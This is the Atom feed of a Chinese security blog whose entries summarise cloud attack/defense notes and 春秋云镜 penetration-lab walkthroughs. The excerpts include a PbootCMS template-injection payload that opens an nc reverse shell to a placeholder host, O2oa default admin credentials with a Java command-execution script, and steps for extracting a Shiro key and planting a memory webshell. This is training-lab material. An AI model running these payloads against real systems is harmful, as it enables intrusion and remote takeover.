<feed xmlns="http://www.w3.org/2005/Atom"> <id>https://hunsil-sudo.github.io/</id><title>hunsil's Blog</title><subtitle>菜菜web手 记录 CTF、Web 安全、Java 反序列化、内网渗透等学习笔记。</subtitle> <updated>2026-08-11T14:58:05+08:00</updated> <author> <name>hunsil</name> <uri>https://hunsil-sudo.github.io/</uri> </author><link rel="self" type="application/atom+xml" href="https://hunsil-sudo.github.io/feed.xml"/><link rel="alternate" type="text/html" hreflang="zh-CN" href="https://hunsil-sudo.github.io/"/> <generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator> <rights> © 2026 hunsil </rights> <icon>/assets/img/favicons/favicon.ico</icon> <logo>/assets/img/favicons/favicon-96x96.png</logo> <entry><title>四大存储对象攻防</title><link href="https://hunsil-sudo.github.io/posts/%E5%9B%9B%E5%A4%A7%E5%AD%98%E5%82%A8%E5%AF%B9%E8%B1%A1%E6%94%BB%E9%98%B2/" rel="alternate" type="text/html" title="四大存储对象攻防" /><published>2026-08-11T00:00:00+08:00</published> <updated>2026-08-11T00:00:00+08:00</updated> <id>https://hunsil-sudo.github.io/posts/%E5%9B%9B%E5%A4%A7%E5%AD%98%E5%82%A8%E5%AF%B9%E8%B1%A1%E6%94%BB%E9%98%B2/</id> <content type="text/html" src="https://hunsil-sudo.github.io/posts/%E5%9B%9B%E5%A4%A7%E5%AD%98%E5%82%A8%E5%AF%B9%E8%B1%A1%E6%94%BB%E9%98%B2/" /> <author> <name>hunsil</name> </author> <category term="云安全" /> <summary>攻防矩阵 该矩阵从前期侦查、初始访问、执行、权限提升、权限维持、防御绕过、信息收集、横向移动和影响这九个维度展开，分别研究了每个维度下，云服务可能面临的威胁。 前期侦查 初始访问 执行 权限提升 权限维持 防御绕过 信息收集 横向移动 影响 API 密钥泄露 Bucket 公开访问 通过控制台执行 利用应用程序提权 在存储对象中植入后门 关闭安全监控服务 用户账号数据泄露 窃取云凭证横向移动 Bucket 接管 控制台账号密码泄露 特定的访问配置策略 利用云厂商命...</summary> </entry> <entry><title>春秋云镜-无间计划</title><link href="https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-%E6%97%A0%E9%97%B4%E8%AE%A1%E5%88%92/" rel="alternate" type="text/html" title="春秋云镜-无间计划" /><published>2026-08-09T00:00:00+08:00</published> <updated>2026-08-09T00:00:00+08:00</updated> <id>https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-%E6%97%A0%E9%97%B4%E8%AE%A1%E5%88%92/</id> <content type="text/html" src="https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-%E6%97%A0%E9%97%B4%E8%AE%A1%E5%88%92/" /> <author> <name>hunsil</name> </author> <category term="渗透" /> <summary>flag1(里哟给模板注入) fscan扫一下 参考文章：https://guokeya.github.io/post/WscncUrcS/ 里哟给模板注入漏洞命令执行 ?a=}{pboot{user:password}:if(("sys\x74em")("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&amp;gt;&amp;amp;1|nc ip port &amp;gt;/tmp/f"));//)}xxx{/pboot{user:password}:if} vps连上后直接一句话上vshell 第一层内网 fscan+代理 ip addr show 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default q...</summary> </entry> <entry><title>春秋云镜-Cloudnet</title><link href="https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Cloudnet/" rel="alternate" type="text/html" title="春秋云镜-Cloudnet" /><published>2026-08-08T00:00:00+08:00</published> <updated>2026-08-08T00:00:00+08:00</updated> <id>https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Cloudnet/</id> <content type="text/html" src="https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Cloudnet/" /> <author> <name>hunsil</name> </author> <category term="渗透" /> <summary>flag1(O2oa) 8080端口一进去就是O2oa的后台登录界面 O2oa 默认账密 xadmin/o2oa@2022 登录进去，在应用——服务管理——接口配置新建一个接口 var a = mainOutput(); function mainOutput() { var classLoader = Java.type("java.lang.ClassLoader"); var systemClassLoader = classLoader.getSystemClassLoader(); var runtimeMethod = systemClassLoader.loadClass("java.lang.Runtime"); var getRuntime = runtimeMethod.getDeclaredMethod("getRunt...</summary> </entry> <entry><title>春秋云镜-Vertex</title><link href="https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Vertex/" rel="alternate" type="text/html" title="春秋云镜-Vertex" /><published>2026-07-09T00:00:00+08:00</published> <updated>2026-07-09T00:00:00+08:00</updated> <id>https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Vertex/</id> <content type="text/html" src="https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Vertex/" /> <author> <name>hunsil</name> </author> <category term="渗透" /> <summary>flag1(入口机1) fscan先扫描一下 经典heapdump /actuator/heapdump 直接拿ShiroKey java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump 用工具注入冰蝎内存马，根目录拿到flag 一层代理 传入fscan和gost搭代理 fscan.exe -h 192.168.8.9/24 -np start infoscan 192.168.8.146:22 open 192.168.8.42:22 open 192.168.8.42:80 open 192.168.8.9:80 open 192.168.8.16:135 open 192.168.8.12:135 open 192.168.8.9:135 open 192.168.8.26:135 open 1...</summary> </entry> <entry><title>春秋云镜-Exchange</title><link href="https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Exchange/" rel="alternate" type="text/html" title="春秋云镜-Exchange" /><published>2026-07-09T00:00:00+08:00</published> <updated>2026-07-09T00:00:00+08:00</updated> <id>https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Exchange/</id> <content type="text/html" src="https://hunsil-sudo.github.io/posts/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Exchange/" /> <author> <name>hunsil</name> </author> <category term="渗透" /> <summary>flag1(华夏erp的Fastjson) start infoscan 39.99.138.162:8000 open 39.99.138.162:80 open 39.99.138.162:22 open [*] alive ports len is: 3 start vulscan [*] WebTitle http://39.99.138.162 code:200 len:19813 title:lumia [*] WebTitle http://39.99.138.162:8000 code:302 len:0 title:None 跳转url: http://39.99.138.162:8000/login.html [*] WebTitle http://39.99.138.162:8000/login.html code:200 len:566...</summary> </entry> </feed>
